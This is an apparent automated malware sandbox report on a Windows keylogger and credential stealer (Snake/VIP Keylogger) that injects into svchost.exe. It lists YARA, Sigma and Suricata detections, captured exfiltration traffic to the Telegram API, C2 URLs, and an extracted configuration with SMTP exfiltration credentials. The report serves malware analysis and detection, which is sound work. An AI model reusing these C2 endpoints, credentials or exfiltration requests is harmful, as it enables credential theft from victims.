0.2.BgroUcYHpy.exe.1360000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 13 88 44 24 2B 88 44 24 2F B0 E2 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.3.svchost.exe.3259f20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.3.svchost.exe.3259f20.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.3.svchost.exe.3259f20.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.3.svchost.exe.3259f20.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.3.svchost.exe.3259f20.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34823:$a1: get_encryptedPassword 0x347f7:$a2: get_encryptedUsername 0x348bb:$a3: get_timePasswordChanged 0x347d3:$a4: get_passwordField 0x34839:$a5: set_encryptedPassword 0x34606:$a7: get_logins 0x2ff44:$a10: KeyLoggerEventArgs 0x2ff13:$a11: KeyLoggerEventArgsEventHandler 0x346da:$a13: _encryptedPassword
2.3.svchost.exe.3259f20.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e576:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3dc19:$a3: \Google\Chrome\User Data\Default\Login Data 0x3de76:$a4: \Orbitum\User Data\Default\Login Data 0x3e855:$a5: \Kometa\User Data\Default\Login Data
2.3.svchost.exe.3259f20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x323af:$s1: UnHook 0x3234b:$s2: SetHook 0x32384:$s3: CallNextHook 0x32313:$s4: _hook
2.2.svchost.exe.7940000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7940000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7940000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7940000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33943:$a1: get_encryptedPassword 0x33917:$a2: get_encryptedUsername 0x339db:$a3: get_timePasswordChanged 0x338f3:$a4: get_passwordField 0x33959:$a5: set_encryptedPassword 0x33726:$a7: get_logins 0x2f064:$a10: KeyLoggerEventArgs 0x2f033:$a11: KeyLoggerEventArgsEventHandler 0x337fa:$a13: _encryptedPassword
2.2.svchost.exe.7940000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d696:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cd39:$a3: \Google\Chrome\User Data\Default\Login Data 0x3cf96:$a4: \Orbitum\User Data\Default\Login Data 0x3d975:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7940000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x314cf:$s1: UnHook 0x3146b:$s2: SetHook 0x314a4:$s3: CallNextHook 0x31433:$s4: _hook
2.2.svchost.exe.7d00000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.7d00000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.7d00000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.7d00000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.7d00000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.7d00000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.svchost.exe.3374f2e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x32c23:$a1: get_encryptedPassword 0x32bf7:$a2: get_encryptedUsername 0x32cbb:$a3: get_timePasswordChanged 0x32bd3:$a4: get_passwordField 0x32c39:$a5: set_encryptedPassword 0x32a06:$a7: get_logins 0x2e344:$a10: KeyLoggerEventArgs 0x2e313:$a11: KeyLoggerEventArgsEventHandler 0x32ada:$a13: _encryptedPassword
2.2.svchost.exe.3374f2e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c976:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c019:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c276:$a4: \Orbitum\User Data\Default\Login Data 0x3cc55:$a5: \Kometa\User Data\Default\Login Data
2.2.svchost.exe.3374f2e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x307af:$s1: UnHook 0x3074b:$s2: SetHook 0x30784:$s3: CallNextHook 0x30713:$s4: _hook
Click to see the 76 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BgroUcYHpy.exe", CommandLine: "C:\Users\user\Desktop\BgroUcYHpy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BgroUcYHpy.exe", ParentImage: C:\Users\user\Desktop\BgroUcYHpy.exe, ParentProcessId: 1216, ParentProcessName: BgroUcYHpy.exe, ProcessCommandLine: "C:\Users\user\Desktop\BgroUcYHpy.exe", ProcessId: 5004, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\BgroUcYHpy.exe", CommandLine: "C:\Users\user\Desktop\BgroUcYHpy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BgroUcYHpy.exe", ParentImage: C:\Users\user\Desktop\BgroUcYHpy.exe, ParentProcessId: 1216, ParentProcessName: BgroUcYHpy.exe, ProcessCommandLine: "C:\Users\user\Desktop\BgroUcYHpy.exe", ProcessId: 5004, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T16:34:08.822609+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	188.114.96.3	443	TCP
2025-01-08T16:34:10.767457+0100	2803305	3	Unknown Traffic	192.168.2.5	49708	188.114.96.3	443	TCP
2025-01-08T16:34:13.239180+0100	2803305	3	Unknown Traffic	192.168.2.5	49712	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T16:34:06.539976+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-08T16:34:08.243110+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	158.101.44.242	80	TCP
2025-01-08T16:34:09.461856+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T16:34:19.038055+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49722	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://varders.kozow.com:8081	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: phishing
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}
Source: 2.2.svchost.exe.7d00000.4.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "nedusnke@grupokoman.com", "Password": "LKDS6_DcR%g3", "Host": "mail.grupokoman.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: BgroUcYHpy.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: BgroUcYHpy.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: BgroUcYHpy.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2

Source:	Binary string: _.pdb source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: BgroUcYHpy.exe, 00000000.00000003.2055449537.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, BgroUcYHpy.exe, 00000000.00000003.2055552179.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: BgroUcYHpy.exe, 00000000.00000003.2055449537.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, BgroUcYHpy.exe, 00000000.00000003.2055552179.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_002B445A
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BC6D1 FindFirstFileW,FindClose,	0_2_002BC6D1
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_002BC75C
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BEF95
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BF0F2
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BF3F3
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B37EF
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B3B12
Source: C:\Users\user\Desktop\BgroUcYHpy.exe	Code function: 0_2_002BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BBCBC

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091E2834h	2_2_091E2580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091E3206h	2_2_091E2DE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091ECF7Ch	2_2_091ECCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091E0D10h	2_2_091E0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091E169Ah	2_2_091E0B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091E3206h	2_2_091E3134
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091ED3D4h	2_2_091ED128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091ED82Ch	2_2_091ED580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EDC84h	2_2_091ED9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091E3206h	2_2_091E2DE4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_091E0856
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_091E0040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EFAECh	2_2_091EF840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EEDE4h	2_2_091EEB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EF23Ch	2_2_091EEF90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EF694h	2_2_091EF3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EE0DCh	2_2_091EDE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_091E0676
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EE534h	2_2_091EE288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then jmp 091EE98Ch	2_2_091EE6E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49722 -> 149.154.167.220:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 158.101.44.242 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.svchost.exe.7940f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.7940000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.3259f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.5:49175 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2008/01/2025%20/%2023:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\BgroUcYHpy.exe

Code function: 0_2_002C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_002C22EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2008/01/2025%20/%2023:18:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 15:34:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: svchost.exe, 00000002.00000002.4484159443.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487794236.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2057571582.0000000003259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4484780955.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4487278704.0000000007940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
